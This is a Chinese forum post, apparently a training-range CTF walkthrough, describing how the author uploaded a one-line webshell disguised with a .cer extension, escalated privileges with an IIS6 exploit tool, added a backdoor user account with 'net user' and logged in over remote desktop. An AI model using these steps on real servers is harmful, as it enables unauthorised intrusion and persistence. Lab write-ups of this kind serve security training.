靶场第六题 九五作业

九五   ·   发表于 2018-07-31 17:17:48   ·   CTF&WP专版

通过第五题进入了后台找到产品管理可以修改上传文件

制作了一句话木马程序,把后缀名改为cer可以上传

之后用菜刀连接,但是没有权限访问C盘

通过E:5\admin\Databackup\打开CMD

输入命令whoima,拒绝访问

输入命令iis6.exe "net user jiuwu 1234 /add"

net user发现成功添加用户

mstsc /admin命令,远程连接桌面120.203.13.75

使用用户名jiuwu,密码1234 就可以登陆到网站服务器

打赏我,让我更有动力~

0 条回复   |  直到 2018-7-31 | 1218 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.